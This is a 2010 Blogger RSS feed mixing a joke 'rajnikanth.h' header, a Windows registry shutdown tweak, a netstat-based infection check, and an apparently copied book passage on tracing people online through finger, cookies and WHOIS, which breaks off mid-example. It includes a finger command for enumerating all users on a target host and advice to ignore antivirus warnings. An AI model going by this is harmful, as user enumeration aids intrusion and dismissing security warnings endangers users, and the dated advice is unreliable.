<?xml version='1.0' encoding='UTF-8'?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/" xmlns:blogger="http://schemas.google.com/blogger/2008" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-2006778997813420298</atom:id><lastBuildDate>Fri, 25 Oct 2024 06:55:41 +0000</lastBuildDate><category>HP and the deathly hallows</category><category>Harry potter</category><category>harry</category><category>algorithm</category><category>earn</category><category>encryption</category><category>hack</category><category>hacking</category><category>hogwarts</category><category>horcrux</category><category>money</category><category>new</category><category>potter</category><category>stress relief</category><category>tips</category><title>Karthik Writes The Best!</title><description>Web place where his words are worth!&#xa;(BEWARE OF THIS HACKER)</description><link>http://kwtb.blogspot.com/</link><managingEditor>noreply@blogger.com (Karthik)</managingEditor><generator>Blogger</generator><openSearch:totalResults>67</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2006778997813420298.post-4397008587208606113</guid><pubDate>Mon, 29 Nov 2010 13:57:00 +0000</pubDate><atom:updated>2010-11-29T19:27:29.688+05:30</atom:updated><title>RAJNIKANTH.H code !!</title><description>&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 14px;&quot;&gt;Highly confidential code of rajnikanth.h leaked... Can&#39;t believe its so simple.. :-P&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 14px;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 14px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 14px;&quot;&gt;------------START RAJNIKANTH.H-----------------&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 14px;&quot;&gt;/* rajnikanth.h&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 14px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 14px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 14px;&quot;&gt;Defines everything in the world!&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 14px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 14px;&quot;&gt;Copyright (c) RAJNIKANTH&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 14px;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 14px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 14px;&quot;&gt;All Rights Reserved.&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 14px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 14px;&quot;&gt;*/&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 14px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 14px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 14px;&quot;&gt;#ifndef __RAJNIKANTH_H&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 14px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 14px;&quot;&gt;#define __RAJNIKANTH_H&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 14px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 14px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 14px;&quot;&gt;void _Cdecl iDidEverything(...);&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 14px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 14px;&quot;&gt;void _Cdecl iAmDoingEverything(...);&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 14px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 14px;&quot;&gt;void _Cdecl iWillDoEverything(...);&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 14px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 14px;&quot;&gt;void _Cdecl iCanDoAnything(...);&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 14px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 14px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 14px;&quot;&gt;------------END OF RAJNIKANTH.H-----------------&lt;/span&gt;</description><link>http://kwtb.blogspot.com/2010/11/rajnikanthh-code.html</link><author>noreply@blogger.com (Karthik)</author><thr:total>22</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2006778997813420298.post-7793133072179151233</guid><pubDate>Wed, 22 Sep 2010 11:30:00 +0000</pubDate><atom:updated>2010-09-22T17:00:44.064+05:30</atom:updated><title>Auto End Tasks to Enable a Proper Shutdown</title><description>This reg file automatically ends tasks and timeouts that prevent programs from shutting down and clears the Paging File on Exit.&lt;br /&gt;
&lt;br /&gt;
1. Copy the following (everything in the box) into notepad.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Windows Registry Editor Version 5.00&lt;br /&gt;
&lt;br /&gt;
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]&lt;br /&gt;
&quot;ClearPageFileAtShutdown&quot;=dword:00000001&lt;br /&gt;
&lt;br /&gt;
[HKEY_USERS\.DEFAULT\Control Panel\Desktop]&lt;br /&gt;
&quot;AutoEndTasks&quot;=&quot;1&quot;&lt;br /&gt;
&lt;br /&gt;
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control]&lt;br /&gt;
&quot;WaitToKillServiceTimeout&quot;=&quot;1000&quot;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
2. Save the file as shutdown.reg&lt;br /&gt;
3. Double click the file to import into your registry.&lt;br /&gt;
&lt;br /&gt;
NOTE: If your anti-virus software warns you of a &quot;malicious&quot; script, this is normal if you have &quot;Script Safe&quot; or similar technology enabled.</description><link>http://kwtb.blogspot.com/2010/09/auto-end-tasks-to-enable-proper.html</link><author>noreply@blogger.com (Karthik)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2006778997813420298.post-8363958183453091051</guid><pubDate>Tue, 21 Sep 2010 14:07:00 +0000</pubDate><atom:updated>2010-09-21T19:37:05.895+05:30</atom:updated><title>Checking Your PC for infection</title><description>When you first turn on you computer (BEFORE DIALING INTO YOUR ISP),&lt;br /&gt;
open a MS-DOS Prompt window (start/programs MS-DOS Prompt).&lt;br /&gt;
Then type netstat -arn and press the Enter key.&lt;br /&gt;
Your screen should display the following (without the dotted lines&lt;br /&gt;
which I added for clarification).&lt;br /&gt;
&lt;br /&gt;
-----------------------------------------------------------------------------&lt;br /&gt;
Active Routes:&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;Network Address &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Netmask &amp;nbsp;Gateway Address &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Interface &amp;nbsp;Metric&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;127.0.0.0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;255.0.0.0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;127.0.0.1 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;127.0.0.1 &amp;nbsp; &amp;nbsp; &amp;nbsp;1&lt;br /&gt;
&amp;nbsp;&amp;nbsp;255.255.255.255 &amp;nbsp;255.255.255.255 &amp;nbsp;255.255.255.255 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;0.0.0.0 &amp;nbsp; &amp;nbsp; &amp;nbsp;1&lt;br /&gt;
&lt;br /&gt;
Route Table&lt;br /&gt;
&lt;br /&gt;
Active Connections&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;Proto &amp;nbsp;Local Address &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Foreign Address &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;State&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
If you see anything else, there might be a problem (more on that later).&lt;br /&gt;
Now dial into your ISP, once you are connected;&lt;br /&gt;
go back to the MS-DOS Prompt and run the same command as before&lt;br /&gt;
netstat -arn, this time it will look similar to the following (without&lt;br /&gt;
dotted lines).&lt;br /&gt;
&lt;br /&gt;
-------------------------------------------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Active Routes:&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;Network Address &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Netmask &amp;nbsp;Gateway Address &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Interface &amp;nbsp;Metric&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;0.0.0.0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;0.0.0.0 &amp;nbsp; &amp;nbsp;216.1.104.70 &amp;nbsp; &amp;nbsp;216.1.104.70 &amp;nbsp; &amp;nbsp; &amp;nbsp;1&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;127.0.0.0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;255.0.0.0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;127.0.0.1 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;127.0.0.1 &amp;nbsp; &amp;nbsp; &amp;nbsp;1&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp;216.1.104.0 &amp;nbsp; &amp;nbsp;255.255.255.0 &amp;nbsp; &amp;nbsp;216.1.104.70 &amp;nbsp; &amp;nbsp;216.1.104.70 &amp;nbsp; &amp;nbsp; &amp;nbsp;1&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp;216.1.104.70 &amp;nbsp;255.255.255.255 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;127.0.0.1 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;127.0.0.1 &amp;nbsp; &amp;nbsp; &amp;nbsp;1&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp;216.1.104.255 &amp;nbsp;255.255.255.255 &amp;nbsp; &amp;nbsp;216.1.104.70 &amp;nbsp; &amp;nbsp;216.1.104.70 &amp;nbsp; &amp;nbsp; &amp;nbsp;1&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;224.0.0.0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;224.0.0.0 &amp;nbsp; &amp;nbsp;216.1.104.70 &amp;nbsp; &amp;nbsp;216.1.104.70 &amp;nbsp; &amp;nbsp; &amp;nbsp;1&lt;br /&gt;
&amp;nbsp;&amp;nbsp;255.255.255.255 &amp;nbsp;255.255.255.255 &amp;nbsp; &amp;nbsp;216.1.104.70 &amp;nbsp; &amp;nbsp;216.1.104.70 &amp;nbsp; &amp;nbsp; &amp;nbsp;1&lt;br /&gt;
&lt;br /&gt;
Route Table&lt;br /&gt;
&lt;br /&gt;
Active Connections&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;Proto &amp;nbsp;Local Address &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Foreign Address &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;State&lt;br /&gt;
&amp;nbsp;&amp;nbsp;TCP &amp;nbsp; &amp;nbsp;0.0.0.0:0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;0.0.0.0:0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;LISTENING&lt;br /&gt;
&amp;nbsp;&amp;nbsp;TCP &amp;nbsp; &amp;nbsp;216.1.104.70:137 &amp;nbsp; &amp;nbsp; &amp;nbsp;0.0.0.0:0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;LISTENING&lt;br /&gt;
&amp;nbsp;&amp;nbsp;TCP &amp;nbsp; &amp;nbsp;216.1.104.70:138 &amp;nbsp; &amp;nbsp; &amp;nbsp;0.0.0.0:0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;LISTENING&lt;br /&gt;
&amp;nbsp;&amp;nbsp;TCP &amp;nbsp; &amp;nbsp;216.1.104.70:139 &amp;nbsp; &amp;nbsp; &amp;nbsp;0.0.0.0:0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;LISTENING&lt;br /&gt;
&amp;nbsp;&amp;nbsp;UDP &amp;nbsp; &amp;nbsp;216.1.104.70:137 &amp;nbsp; &amp;nbsp; &amp;nbsp;*:* &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
What you are seeing in the first section (Active Routes) under the heading of&lt;br /&gt;
Network Address are some additional lines. The only ones that should be there&lt;br /&gt;
are ones belonging to your ISP (more on that later). In the second section&lt;br /&gt;
(Route Table) under Local Address you are seeing the IP address that your ISP&lt;br /&gt;
assigned you (in this example 216.1.104.70).&lt;br /&gt;
&lt;br /&gt;
The numbers are divided into four dot notations, the first three should be&lt;br /&gt;
the same for both sets, while in this case the .70 is the unique number&lt;br /&gt;
assigned for THIS session. Next time you dial in that number will more than&lt;br /&gt;
likely be different.&lt;br /&gt;
&lt;br /&gt;
To make sure that the first three notation are as they should be, we will run&lt;br /&gt;
one more command from the MS-DOS window.&lt;br /&gt;
From the MS-DOS Prompt type tracert /www.yourispwebsite.com or .net&lt;br /&gt;
or whatever it ends in. Following is an example of the output you should see.&lt;br /&gt;
&lt;br /&gt;
---------------------------------------------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Tracing route to /www.motion.net [207.239.117.112]over a maximum of 30 hops:&lt;br /&gt;
1 &amp;nbsp;128 ms &amp;nbsp;2084 ms &amp;nbsp;102 ms &amp;nbsp;chat-port.motion.net [216.1.104.4]&lt;br /&gt;
2 &amp;nbsp;115 ms &amp;nbsp;188 ms &amp;nbsp;117 ms &amp;nbsp;chat-core.motion.net [216.1.104.1]&lt;br /&gt;
3 &amp;nbsp;108 ms &amp;nbsp;116 ms &amp;nbsp;119 ms &amp;nbsp;www.motion.net [207.239.117.112]&lt;br /&gt;
Trace complete.&lt;br /&gt;
&lt;br /&gt;
------------------------------------------------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
You will see that on lines with the 1 and 2 the first three notations of the&lt;br /&gt;
address match with what we saw above, which is a good thing. If it does not,&lt;br /&gt;
then some further investigation is needed.&lt;br /&gt;
&lt;br /&gt;
If everything matches like above, you can almost breath easier. Another thing&lt;br /&gt;
which should you should check is programs launched during startup. To find&lt;br /&gt;
these, Click start/programs/startup, look at what shows up. You should be&lt;br /&gt;
able to recognize everything there, if not, once again more investigation is&lt;br /&gt;
needed.&lt;br /&gt;
&lt;br /&gt;
-------------------------------------------------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Now just because everything reported out like we expected (and demonstrated&lt;br /&gt;
above) we still are not out of the woods. How is this so, you ask? Do you use&lt;br /&gt;
Netmeeting? Do you get on IRC (Internet Relay Chat)? Or any other program&lt;br /&gt;
that makes use of the Internet. Have you every recieved an email with an&lt;br /&gt;
attachment that ended in .exe? The list goes on and on, basically anything&lt;br /&gt;
that you run could have become infected with a trojan. What this means, is&lt;br /&gt;
the program appears to do what you expect, but also does just a little more.&lt;br /&gt;
This little more could be blasting ebay.com or one of the other sites that&lt;br /&gt;
CNNlive was talking about.&lt;br /&gt;
&lt;br /&gt;
What can you do? Well some anti-virus software will detect some trojans.&lt;br /&gt;
Another (tedious) thing is to start each of these &quot;extra&quot; Internet programs&lt;br /&gt;
one at a time and go through the last two steps above, looking at the routes&lt;br /&gt;
and connection the program uses. However, the tricky part will be figuring&lt;br /&gt;
out where to tracert to in order to find out if the addresses you see in&lt;br /&gt;
step 2 are &quot;safe&quot; or not. I should forewarn you, that running tracert after&lt;br /&gt;
tracert, after tracert might be considered &quot;improper&quot; by your ISP. The steps&lt;br /&gt;
outlined above may not work exactly as I have stated depending upon your ISP,&lt;br /&gt;
but with a true ISP it should work. Finally, this advise comes with NO&lt;br /&gt;
warranty and by following my &quot;hints&#39; you implicitly release me from ANY and&lt;br /&gt;
ALL liability which you may incur.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;Other options&lt;br /&gt;
&lt;br /&gt;
Display protocol statistics and current TCP/IP network connections.&lt;br /&gt;
Netstat [-a] [-e] [-n] [-s] [-p proto] [-r] [intervals]&lt;br /&gt;
&lt;br /&gt;
-a.. Display all connections and listening ports.&lt;br /&gt;
-e.. Display Ethernet statistics. This may be combined with the -s option.&lt;br /&gt;
-n.. Diplays address and port numbers in the numerical form.&lt;br /&gt;
-p proto..Shows connections for the protocol specified by proto; proto may be&lt;br /&gt;
TCP or UDP. If used with the -s option to display per-protocol statistics,&lt;br /&gt;
proto may be TCP, UDP, of IP.&lt;br /&gt;
-r.. Display the routing table.&lt;br /&gt;
-s.. Display per-protocol statistics. By default, statistics are shown for TCP&lt;br /&gt;
UDP and IP; the -p option may be used to specify a subset of the default&lt;br /&gt;
interval..Redisplay selected statistics, pausing intervals seconds between each&lt;br /&gt;
display. If omitted. netstat will print the current configuration information&lt;br /&gt;
once</description><link>http://kwtb.blogspot.com/2010/09/checking-your-pc-for-infection.html</link><author>noreply@blogger.com (Karthik)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2006778997813420298.post-5767449426844130602</guid><pubDate>Fri, 17 Sep 2010 05:51:00 +0000</pubDate><atom:updated>2010-09-17T11:31:36.711+05:30</atom:updated><title>Finding Identity Online!</title><description>&lt;p&gt;When the network that is now the Internet was first designed, it was assumed  that all users wanted to be found. No one had reason to hide, and it seemed  sensible that researchers should be able to locate each other. Utilities were  therefore created to facilitate such finding.&lt;/p&gt; &lt;p&gt;Since those early days, the rise of multiple protocols has made finding  people even more convenient. As you will see later in this chapter, the old days  demanded a high level of networking knowledge from the user. Today, finding or  identifying most individuals is trivial. Throughout this chapter, I examine  those techniques, as well as some concepts about wholesale tracing (tracing many  individuals at one time).&lt;/p&gt; &lt;p&gt;You may wonder why this is deemed a security issue. In truth, it really  isn&#39;t--not yet. As you read this chapter, however, you will learn that the  Internet is a powerful tool for domestic spying. Law-enforcement and  intelligence agencies already conduct such practices on the Internet, and for  them, the Network is a bonanza. No search warrant is needed to &quot;study&quot; the  activity of someone on the Internet. Likewise, no warrant is needed to compile  lists of individuals who law enforcement perceive to be involved in illegal (or  even seditious) activity. This is not a joke. If you harbor radical political  views, by the end of this chapter, you may elect to forever keep those views to  yourself (or gain a decent education in cryptography).&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;h2&gt;&lt;span &gt;&lt;b&gt;What&#39;s in a Name?&lt;/b&gt;&lt;/span&gt;&lt;/h2&gt; &lt;p&gt;There are two forms of user identification that apply to all platforms: your  e-mail address and your IP address. It is often theorized that if one is  obscured, the other can never be found. That is untrue. Without chaining  messages through a series of &lt;i&gt;trusted&lt;/i&gt; anonymous remailers (remailers that  are purportedly secure), anonymity on the Internet is virtually impossible.  Anonymous remailers are discussed in Chapter 7, &quot;Birth of a Network: The  Internet.&quot;&lt;/p&gt; &lt;p&gt;It is possible, however, to make yourself relatively invisible, and that is  probably what most individuals would like to do. Before I get more specific,  however, there are some utilities you need to know about, as well as methods of  tracing individuals. I&#39;ll start with finger.  &lt;/p&gt;&lt;h3&gt;&lt;span &gt;&lt;b&gt;finger&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt; &lt;p&gt;The &lt;i&gt;finger&lt;/i&gt; service is a utility common to the UNIX platform. Its  purpose is to provide information about users on a given system. In practical  operation, finger works like most other services available in UNIX.&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;The finger service relies on the client/server model, which is a recurring  theme in Internet applications. This model works as follows: machines running  server applications distribute information to clients. Clients are programs  designed to accept and interpret information from server applications. For  example, you use a Web browser (or client) to read information forwarded by a  Web server (the HTTP server).&lt;/p&gt; &lt;p&gt;In any event, the finger client-server relationship works as follows: On the  targeted machine (almost always a UNIX system), there is a server running called  &lt;tt&gt;fingerd&lt;/tt&gt;. This is more commonly referred to as the &lt;i&gt;finger daemon&lt;/i&gt;.  Its purpose is to answer requests from finger clients from the void.&lt;/p&gt; &lt;p&gt;The finger daemon can return different information, depending largely on the  configuration of the server and the user&#39;s personalized settings. For example,  sometimes an &quot;open&quot; UNIX server (that is, one not running a firewall) will  disallow finger access. This is done by disabling the finger daemon, removing it  from the file &lt;tt&gt;/etc/inetd.conf&lt;/tt&gt;. In this case, the finger service is  never started. Any client-issued finger request forwarded to such a machine will  meet with a blank response (or perhaps, &lt;tt&gt;Connection Refused.&lt;/tt&gt;).&lt;/p&gt; &lt;p&gt;Many organizations, particularly ISPs, government sites, and private  corporations, disable finger services. Each has an interest in preserving the  privacy of its users, and that is usually the reason given for disabling the  service. As you will learn later, however, their motivation may also be system  security.&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;Some sites do not disable finger services altogether, but instead put  restrictions on what type of information can be accessed. For example, by  default, the finger daemon allows a systemwide finger. Anyone can be fingered,  including special or privileged accounts. When systemwide fingering is allowed,  one can gather information on all users currently logged to the machine. This is  done by issuing the following command at a UNIX command prompt:&lt;/p&gt;&lt;pre&gt;&lt;span &gt;finger @my_target_host.com &lt;/span&gt;&lt;/pre&gt; &lt;p&gt;The &lt;tt&gt;@&lt;/tt&gt; symbol has essentially the same effect as the asterisk does in  regular expression searches. When it is used, the user is fingering all users  currently logged to the target machine. This is most useful when targeting small  providers that have few customers, or when conducting such a finger query late  at night. Certainly, fingering a company as large as Netcom in this manner would  be foolish. (The response forwarded by the server would likely be many pages in  length. The only valid reason for doing this would be to generate a database of  Netcom users.) At any rate, some organizations will disallow such a request,  instead forcing the requesting party to specify a particular user.&lt;/p&gt; &lt;p&gt;Other sites make use of &lt;i&gt;hacked&lt;/i&gt; finger daemons, either created in-house  or available as distributions from other sites across the Internet. These are  finger daemons that have enhanced features, including advanced configuration  options.&lt;/p&gt;&lt;p&gt;At any rate, taking you through the process of a finger inquiry will take just a  few moments, but in order for you to exploit the example, you need a finger  client. UNIX users, however, have no need for a finger client, because this is  included in the basic distribution.Finger client for Windows can be found at &lt;tt&gt;&lt;a href=&quot;ftp://papa.indstate.edu/winsock-l/finger/wsfngr14.zip&quot;&gt;ftp://papa.indstate.edu/winsock-l/finger/wsfngr14.zip&lt;/a&gt;&lt;/tt&gt;&lt;/p&gt;&lt;h3&gt;&lt;span &gt;&lt;b&gt;A Few Words About Cookies&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt; &lt;p&gt;&lt;tt&gt;&lt;a href=&quot;ftp://papa.indstate.edu/winsock-l/finger/wsfngr14.zip&quot;&gt;&lt;/a&gt;&lt;/tt&gt;You have seen the message many times. You land on a WWW site and a dialog box  appears. The server at the other end says it wants to set a cookie. Most users  have no idea what this means, so they simply click the OK button and continue.  Other users actually read the dialog box&#39;s contents and get a little worried.  (This is especially true when the cookie is going to be set for sometime into  the year 2000. The user may not be sure what a cookie is, but almost all users  balk when that cookie is going to hang around for 3 or 4 years.)&lt;/p&gt;&lt;p&gt;What are cookies? The cookie concept is very much like getting your hand  stamped at a dance club. You can roam the club, have some drinks, dance, and  even go outside to your car for a few minutes. As long as the stamp is on your  hand, you will not have to pay again, nor will your access be restricted. But  cookies go much further than this. They record specific information about the  user, so when that user returns to the page, the information (known as &lt;i&gt;state  information&lt;/i&gt;) can be retrieved. The issue concerning cookies, though, isn&#39;t  that the information is retrieved. The controversy is about where the  information is retrieved from: your hard disk drive.&lt;/p&gt; &lt;p&gt;Cookies (which Netscape calls &lt;i&gt;persistent client state HTTP cookies&lt;/i&gt;)  are now primarily used to store options about each user as he browses a page.  The folks at Netscape explain it this way:  &lt;/p&gt;&lt;dl&gt; &lt;dd&gt;&quot;This simple mechanism provides a powerful new tool which enables a host of  new types of applications to be written for Web-based environments. Shopping  applications can now store information about the currently selected items, for  fee services can send back registration information and free the client from  retyping a user-id on next connection, sites can store per-user preferences on  the client, and have the client supply those preferences every time that site is  connected to. &quot;&lt;/dd&gt;&lt;/dl&gt;&lt;h3&gt;&lt;span &gt;&lt;b&gt;The WHOIS Service&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt; &lt;p&gt;The WHOIS service (centrally located at &lt;tt&gt;http://who.is&lt;/tt&gt;) contains  the domain registration records of all Internet sites. This registration  database contains detailed information on each Internet site, including domain  name server addresses, technical contacts, the telephone number, and the  address. Here is a WHOIS request result on the provider Netcom, a popular  Northern California Internet service provider:&lt;/p&gt;&lt;pre&gt;&lt;span &gt;NETCOM On-Line Communication Services, Inc (NETCOM-DOM)    3031 